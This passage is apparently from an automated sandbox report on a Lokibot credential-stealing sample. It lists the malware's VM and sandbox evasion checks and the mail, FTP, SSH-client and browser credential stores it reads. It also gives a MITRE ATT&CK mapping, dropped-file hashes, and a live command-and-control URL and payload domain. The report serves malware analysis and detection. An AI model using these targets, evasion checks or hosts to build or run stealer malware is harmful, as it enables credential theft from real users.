        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect Any.run
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dllJump to dropped file
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_0040626D FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004026FE FindFirstFileA,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeAPI call chain: ExitProcess graph end node
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4895164716.00000000024E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[A
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        barindex
        Yara detected Lokibot
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
        Tries to harvest and steal ftp login credentials
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

        Remote Access Functionality

        barindex
        Yara detected Lokibot
        Source: Yara matchFile source: dump.pcap, type: PCAP

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		2
        OS Credential Dumping        		11
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
        Process Injection        		1
        Virtualization/Sandbox Evasion        		1
        Credentials in Registry        		1
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth1
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager3
        File and Directory Discovery        		SMB/Windows Admin Shares2
        Data from Local System        		Automated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
        Process Injection        		NTDS5
        System Information Discovery        		Distributed Component Object Model1
        Clipboard Data        		Scheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        DLL Side-Loading        		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        o6OaOfrAQs.exe29%VirustotalBrowse
        o6OaOfrAQs.exe51%ReversingLabsWin32.Trojan.Nemesis

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.o6OaOfrAQs.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
        1.0.o6OaOfrAQs.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
        4.0.o6OaOfrAQs.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

        Domains

        SourceDetectionScannerLabelLink
        ruhsalgelisim.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://ruhsalgelisim.com/jgEyxsZj50.ttf0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://185.246.220.85/habrik/five/fre.php100%Avira URL Cloudmalware
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ruhsalgelisim.com
        		85.95.248.49
        		truefalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://ruhsalgelisim.com/jgEyxsZj50.ttffalse
        • Avira URL Cloud: safe
        		unknown
        http://185.246.220.85/habrik/five/fre.phptrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdo6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdo6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://nsis.sf.net/NSIS_Erroro6OaOfrAQs.exefalse
          		high
          http://nsis.sf.net/NSIS_ErrorErroro6OaOfrAQs.exefalse
            		high
            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDo6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
              		high
              http://www.gopher.ftp://ftp.o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              85.95.248.49
              		ruhsalgelisim.comTurkey
              		49467EUROTA-ASNEUROTAINTERNETSERVICESLTDTRfalse
              185.246.220.85
              		unknownGermany
              		10753LVLT-10753UStrue

              General Information

              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:829095
              Start date and time:2023-03-17 20:47:29 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 32s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:o6OaOfrAQs.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@4/19@1/2
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 37% (good quality ratio 36.2%)
              • Quality average: 88.9%
              • Quality standard deviation: 21.6%
              HCA Information:
              • Successful, ratio: 81%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, UserOOBEBroker.exe, backgroundTaskHost.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com, wdcp.microsoft.com
              • Execution Graph export aborted for target o6OaOfrAQs.exe, PID 5540 because there are no executed function
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\Kontos.ini

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):54
              Entropy (8bit):4.838039816898156
              Encrypted:false
              SSDEEP:3:7KG/LmI/cXQQLQIfLBJXmgxv:OG/LmI/cXQQkIP2I
              MD5:FB5EE2C0CAC332EC8390F50016EF0769
              SHA1:11D9FB52FE5289140B9D52A38B56F99512B3A3A7
              SHA-256:C557AFE51AB22916E3423820A09D3805BF9DCDCECBEC4FE8DE2C67FB023BA631
              SHA-512:87CCEA7B203B8BFC4E21544FE4FE9693AF230E246C450E673410565791DFE8257E30354772FDCC114C7068D9295FDB491E9B52D1A3B490C0756E568B70B95C0A
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:[Bedrock]..Interthing=user32::EnumWindows(i r1 ,i 0)..

              C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dll

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):11776
              Entropy (8bit):5.832316471889005
              Encrypted:false
              SSDEEP:192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
              MD5:B0C77267F13B2F87C084FD86EF51CCFC
              SHA1:F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
              SHA-256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
              SHA-512:F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:moderate, very likely benign file
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1

              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:data
              Category:dropped
              Size (bytes):47
              Entropy (8bit):1.1262763721961973
              Encrypted:false
              SSDEEP:3:/lSllIEXln:AWE1
              MD5:D69FB7CE74DAC48982B69816C3772E4E
              SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
              SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
              SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
              Malicious:false
              Preview:........................................user.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):34016
              Entropy (8bit):6.1021284380541925
              Encrypted:false
              SSDEEP:384:JP7a6wQdSCVWSdoEdXjYmxzfkfIwuWR7UPMEdxsTStsBdMQJK2wKucYkcuhV3:N7a6eiHdFdr7W5UPMgy+OBG2X90uhV3
              MD5:4FC7FC174E80C178225C2509027DF961
              SHA1:9FF62413EC0DD462F5F016EBC804F1D736D24796
              SHA-256:866B31DD39B97DEDAFD0FBD5672639EE91B47AD319C47816B4F6D01BFF93FF8C
              SHA-512:29261B9ABC4AF2F51C05B61A37721BC737B411530361A4B48A7BFFAB0F8263EA75BFD51B6E6E94E91E1D02DC442B534C3334B05FD8324E7CF307FA08179A1ED9
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z.oPZ.oPZ.oPS..PR.oP..nQX.oP..jQK.oP..kQR.oP..lQX.oP).nQY.oPZ.nPt.oP..fQY.oP..oQ[.oP..P[.oPZ..P[.oP..mQ[.oPRichZ.oP........PE..d....5;a.........." .....0...:.......................................................F....`..........................................\.......]..........H............f..........H....O..p...........................@P...............@..p............................text............0.................. ..`.rdata...#...@...$...4..............@..@.data...@....p.......X..............@....pdata...............Z..............@..@.rsrc...H............^..............@..@.reloc..H............d..............@..B................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\Profetiske.Byg

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:data
              Category:dropped
              Size (bytes):297815
              Entropy (8bit):6.803960139750454
              Encrypted:false
              SSDEEP:6144:J35PGszPFp+EB9h18KeMJwYQl/w+ByCHqLBmv:J3FGsz93N8Kp60Bg
              MD5:12DF13549A2F50FB06EAAC92D2F36C05
              SHA1:5E1CD0421664E97B44B2C26960F4D298DAED0C99
              SHA-256:4EE38AAF3380FB3D7C4F57800A1692175C1D772E3A11028874CF2D8F5DC599F2
              SHA-512:6DD5811B457913D37B922904678A508A1762CDA447C195A660457B19D6302DB8E21586AFF0F22D41D73514CA926FEFE8554777EB558BD321ABF5B76C06527848
              Malicious:false
              Preview:.........T.........h........................@...KK.........[......W......b...................F................,........DD.......WW...................[..........P.'.........hhh.......^^....JJ....x.......F......aaa............................!............IIII...............WW.i......\\..................q.22...........m...555...........m..7.k......m...................c.QQ.........................,.......cc...........?..xxx...............4.........^.....................]].444.XX.........................................ggg..........]....jjjjj..77...........bbb...<<.................++......XX.......!!..qqq...............@.......eeee........[................00.A............................H.yyyyy.....FFFFF..kk.555........lll...H........ssss...MM..j........G...^^...........~.........PP............. ...............III.....}}}...........................""".....))...UU...l.)))).........++...%%..........######....hhh............::..^.5.....(((..............................n..""........zzzzzz......

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\Sankekort.Sch209

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:data
              Category:dropped
              Size (bytes):42836
              Entropy (8bit):4.578518141395867
              Encrypted:false
              SSDEEP:768:AGQ+v3ebyf4b4Yv6Dub2I+MxA83BMUBaPqbIvcbYIrf:NQ+WApD42MxBMMaPqbZbYIrf
              MD5:3DAD0F9AF0356D18A46167665A352768
              SHA1:E5D083D2224DE4FC9105CB966CF3A53F9BB7D3C0
              SHA-256:8A124F4091887491B8FABE0C0C694B95C2D76F68FB4E9292C59FA5971074899C
              SHA-512:7CD0CF5AF5B79A146F22A2D68CC3500AF6068F1BFA48B5730E2C2236201E4B6B7CCED4DBB9121A525F41FC63C07403D1CB40F9267FBF81C5FFC2CB4FA6221E98
              Malicious:false
              Preview:.....WWW.......T..00.............A............>>>.lll.......NNNN........&...........s.$$$....................................++.;;;;...................TT........l.o..........ll.......vv.............+..............V.....'.>.....a....................y.!...{{{.11.<...333......................6666....ee................_.........5......88.............%%..<...........R.................................]]]].........888..............a.n..C.............>............P.....;;.....HHH.........bb.........eee...............QQ..cc..`....................................b.w.......--......GGG...JJJ.U......uu.VV....v..ii. ............FF.........K........................1.............44444.........................QQQ....,.//.....w...........ll.....SS....(.......H............B.....OOOO.........__....l..........................}..//.vvvv....ii................~~~..EEE..MM..............L.@@.....G...........:.................888..........))..............?......FF.......DDDD..............@@@@@...................

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Hjtideligholdelser\Liechtensteiner\Systemopstninger\pan-start-symbolic.symbolic.png

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):140
              Entropy (8bit):5.529383944212929
              Encrypted:false
              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllDM9vFW0p/sXm1MMos9DwlTYTbklt/sbp:6v/lhPysx8vFW0pkX4iZlTYTI3Ebp
              MD5:4308BBBAB1DB146494AE5ABB07B8E6DB
              SHA1:58121574EEB070E26DDD75A964F3548E176E58A4
              SHA-256:EFB732049C674EB25BFCB2FA0CBCC45D24190BF1479C054647F424B31E34C828
              SHA-512:41C9B37516F8D6AB7155F890EE36C26FE4161383A93BFBF696AB18292774C3556642E898361D21CECCBFEFFAF5814495CFAC2C74791E02F068B055BD3AD87DE4
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d....CIDAT8.c`.J..R..(...\.`..2.Y3...k.i......b..PN.....J.@6.l.`.Pd..A.....O...D....IEND.B`.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Hjtideligholdelser\Liechtensteiner\Systemopstninger\printer-symbolic.symbolic.png

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):147
              Entropy (8bit):5.834297280344084
              Encrypted:false
              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
              MD5:38D787F55E22FB591135F9250CD259D4
              SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
              SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
              SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Idolatrous\Kaes\pt-br.txt

              Download File
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):9515
              Entropy (8bit):5.04214621707661
              Encrypted:false
              SSDEEP:192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
              MD5:7B02E1AE16E2E709D7C97DE560B4DBE9
              SHA1:191A54644417F7D36F5CB4182DCDB3737D74BE51
              SHA-256:DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
              SHA-512:4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
              Malicious:false
              Preview:.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o

              C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Ravingly\Magnetoplasmadynamics\godsvognen\avatar-default-symbolic.svg
